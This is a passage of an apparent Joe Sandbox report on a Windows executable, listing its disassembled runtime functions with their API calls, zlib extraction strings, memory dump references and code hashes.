SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF166C3E
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF166C63
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF166C8C
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF166C9E

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Value$ErrorLast$Alloc
String ID:
API String ID: 2126241587-0
Opcode ID: 852b0597fec4dfbc0bc9dd8f2a6ab49820f5ce1a9851ce7328ccfbc18031558d
Instruction ID: 9fe3667d6a7aea3141e23f8222ff47b296106a97f8caa81975300b8d086e919d
Opcode Fuzzy Hash: 852b0597fec4dfbc0bc9dd8f2a6ab49820f5ce1a9851ce7328ccfbc18031558d
Instruction Fuzzy Hash: A8315E22F0DA4386FB585B24A975D382352AF84BA0F044734D83ECB7DEEF6CA4429700

Function 00007FF6399B11F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

malloc, xrefs: 00007FF6399B129C, 00007FF6399B12CA
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF6399B1295
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF6399B12C3
1.3.1, xrefs: 00007FF6399B1229
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF6399B13EE
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF6399B1256

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: Message
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2030045667-2813020118
Opcode ID: 837a0bdd7d7e9c0c650dbdb2abef573860da09095db3ef3adea652022a4cf349
Instruction ID: 88179a86b7aa1330dad24a7fc1667e6f97bd9599c60cf048bf6b2e81c4725f7c
Opcode Fuzzy Hash: 837a0bdd7d7e9c0c650dbdb2abef573860da09095db3ef3adea652022a4cf349
Instruction Fuzzy Hash: 5F51A422A0864285E6609F16A8503BA62A3FF85794F4C4135ED4EC7BDFEF3CE545EB00

Function 00007FF6399CAD6C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399CB199

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 61b7c791dd7b4870e419cd94b23561cebff66563b6152af2ba6a1b175460b8f9
Instruction ID: 5748faccd5ef5678ca2b6ef09e05b2af5f75f984602b9b99672265fd744ff17d
Opcode Fuzzy Hash: 61b7c791dd7b4870e419cd94b23561cebff66563b6152af2ba6a1b175460b8f9
Instruction Fuzzy Hash: F6C1CF22E0C68791EB609F1598402BE7792EB91B80F5D0131EA4E837DBCE7DE855EF10

Function 00007FF6399B33E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF6399B3534), ref: 00007FF6399B3411

Part of subcall function 00007FF6399B29E0: GetLastError.KERNEL32(?,?,?,00007FF6399B342E,?,00007FF6399B3534), ref: 00007FF6399B2A14
Part of subcall function 00007FF6399B29E0: FormatMessageW.KERNEL32(?,?,?,00007FF6399B342E), ref: 00007FF6399B2A7D
Part of subcall function 00007FF6399B29E0: MessageBoxW.USER32 ref: 00007FF6399B2ACF

Strings

Failed to convert executable path to UTF-8., xrefs: 00007FF6399B34B8
\\?\, xrefs: 00007FF6399B3482
GetModuleFileNameW, xrefs: 00007FF6399B3422
Failed to resolve full path to executable %ls., xrefs: 00007FF6399B3461
Failed to obtain executable path., xrefs: 00007FF6399B341B

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: Message$ErrorFileFormatLastModuleName
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 517058245-2863816727
Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
Instruction ID: 0b821c11b5d6de232619a43c745e28e1b4ccaa86e4296a8c93d4fa5f0bbe5a05
Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
Instruction Fuzzy Hash: EF216B61B1858291FA21DF25E8513B96263FF5C384F880136D65DC67EFEE6CE508AB00

Function 00007FF6399CEC9C Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6399CED8C
_get_daylight.LIBCMT ref: 00007FF6399CED9D
_get_daylight.LIBCMT ref: 00007FF6399CEDAE
_isindst.LIBCMT ref: 00007FF6399CEE79

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
Instruction ID: f4e79b71904c1ff37af8a669b50b98185434cf2768d2b4c179c850260e5e5c11
Opcode Fuzzy Hash: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
Instruction Fuzzy Hash: 5251E772F042158FFB24DFA89D556BC27A2AB10399F580135DD1E97BEADF38A8019F00

Function 00007FF6399C4A8C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE ref: 00007FF6399C4ABF
GetFileInformationByHandle.KERNELBASE ref: 00007FF6399C4B21
GetLastError.KERNEL32 ref: 00007FF6399C4BB2
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6399C49C4), ref: 00007FF6399C4BFE

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 26d7b7321f63d0f75eae76757bf07adbfaa4e90fbb1b3f47974b354d61199844
Instruction ID: 0f1b07eacf3df4d079e50d352f0a95682faf805fb36bbea8a3f3ab395b8af27a
Opcode Fuzzy Hash: 26d7b7321f63d0f75eae76757bf07adbfaa4e90fbb1b3f47974b354d61199844
Instruction Fuzzy Hash: 9B515A22F086428AFB14CF71D8513BD23A2AB58B98F188535DE0A877DEDF38D4819F50

Function 00007FF6399C4938 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C4965
CreateFileW.KERNELBASE ref: 00007FF6399C49A4
CloseHandle.KERNEL32 ref: 00007FF6399C49D9

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: c9c3dc0ca6ff3025a18f37416ed5252826b5e2a6b8668c561ba6737191909872
Instruction ID: d86e09f8cbbad61bca77b3c1c794342783440ca4a578cbe66bbc096c242f6ef3
Opcode Fuzzy Hash: c9c3dc0ca6ff3025a18f37416ed5252826b5e2a6b8668c561ba6737191909872
Instruction Fuzzy Hash: A4418322E1878283F7548F6199503696362FF947A4F149334E69E83BDADF6CA5E09F00

Function 00007FF6399BBF5C Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6399BC12C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6399BC140

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF6399BBF80
__scrt_release_startup_lock.LIBCMT ref: 00007FF6399BBFEE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF6399BC041

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
Instruction ID: 8a9f39432b948cad89da80364e2310a65faae9c4efa567a0c76dc4086c1912a0
Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
Instruction Fuzzy Hash: A6313B21E0C24341FA54AF6994563BA23A3DF45388F4C0039EA4EC73DFEE6CA844AE11

Function 00007FF6399BF45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399BF4A0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399BF597

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8760811a46c694da2ce7fcb713cb8132a6e7826c56b7b9f56bdeeaa18c726bba
Instruction ID: 1f44f84ff129918ef5f3b68ce49d1b10d00982163c535169be32d39b147f081c
Opcode Fuzzy Hash: 8760811a46c694da2ce7fcb713cb8132a6e7826c56b7b9f56bdeeaa18c726bba
Instruction Fuzzy Hash: 6351C861B0924686F728AEA6980467A66A3FF44BB4F1C4634DD6D877DFCE3CD401AE00

Function 00007FF6399CB444 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF6399CB5DD), ref: 00007FF6399CB490
GetLastError.KERNEL32(?,?,?,?,?,00007FF6399CB5DD), ref: 00007FF6399CB49A

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
Instruction ID: 97379b8f0a5df6675013fbd6b14d18b1a607e48d8dd03c19710b3dc120bc145e
Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
Instruction Fuzzy Hash: 6E118262A1CA8281DA108F25A844169B362AB48BF4F584331EE7D877EFCE7CD150DF40

Function 00007FF6399C4C34 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6399C4B49), ref: 00007FF6399C4C67
SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6399C4B49), ref: 00007FF6399C4C7D

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
Instruction ID: 06df372914fd51c812a9b0542dcf4cd10f13bc34fe9600358745f0237e82abd1
Opcode Fuzzy Hash: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
Instruction Fuzzy Hash: A9118232A0C602C1EA548F11A84107EB7A2FB85765F540235E6AEC1BEDEF2DD414EF00

Function 00007FF6399C9C58 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF6399D2032,?,?,?,00007FF6399D206F,?,?,00000000,00007FF6399D2535,?,?,?,00007FF6399D2467), ref: 00007FF6399C9C6E
GetLastError.KERNEL32(?,?,?,00007FF6399D2032,?,?,?,00007FF6399D206F,?,?,00000000,00007FF6399D2535,?,?,?,00007FF6399D2467), ref: 00007FF6399C9C78

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
Instruction ID: 16df52110ee5e55702c2eb7e830f0380646ec7fa15918a9bd4f9681bfb5eda65
Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
Instruction Fuzzy Hash: 7CE0B650F0964682FF186FB2AC9517912A79F98742B4C4034D91EC73DBEE2C6845AE64

Function 00007FF6399C9E68 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FF6399C9CE5,?,?,00000000,00007FF6399C9D9A), ref: 00007FF6399C9ED6
GetLastError.KERNEL32(?,?,?,00007FF6399C9CE5,?,?,00000000,00007FF6399C9D9A), ref: 00007FF6399C9EE0

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
Instruction ID: 6872ea66d87ee275f1728c6d3d61bce00b027398d8511cba363d58449f465ec7
Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
Instruction Fuzzy Hash: F1219251F1C64241EB549B65AD9037922979F94790F1C4235E92EC77DBCE6CE840AF00

Function 00007FFDFF161DA0 Relevance: 2.6, APIs: 2, Instructions: 50memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FFDFF168732,?,?,?,00007FFDFF1A6FE9,?,?,?,?,00007FFDFF166EAA), ref: 00007FFDFF161DE8

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 4dd9cb5e32b6fda013bb4f9bbcdc076170478b4e0b777caec088e64ee6da944d
Instruction ID: e7400cb80693726e0a5467cae0f6562ed0f24c7d3569e2d918509722d59acc6f
Opcode Fuzzy Hash: 4dd9cb5e32b6fda013bb4f9bbcdc076170478b4e0b777caec088e64ee6da944d
Instruction Fuzzy Hash: D6117323F0868285FB64DB559430EB92390AF89B90F485734D93E8B3EEDF6CA5454214

Function 00007FF6399CB1BC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399CB1E4

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
Instruction ID: 1ef58e78cba51d7d1ac4b0c52c93c23deca71ee39994f10030582f55c7ce0763
Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
Instruction Fuzzy Hash: 4041D332D4964287EA249F25A94127D73A6EB55B80F180131D68EC37DACF3CE402EF51

Function 00007FF6399B76A0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF6399B774A

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: d1e95230d04fde96e1338c6789254e05c2d0d71a0994656c7f30c873f5989810
Instruction ID: 112920b6347dd9481128a4aadfd3008750ea527117ab69629fe34ce041bf3be9
Opcode Fuzzy Hash: d1e95230d04fde96e1338c6789254e05c2d0d71a0994656c7f30c873f5989810
Instruction Fuzzy Hash: 3E21A622B0865646FA10AE1AAD443BAA6A6FF45BD4F8C4530DD4D87BCBDE7DE041DB00

Function 00007FF6399CAC4C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399CACD2

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

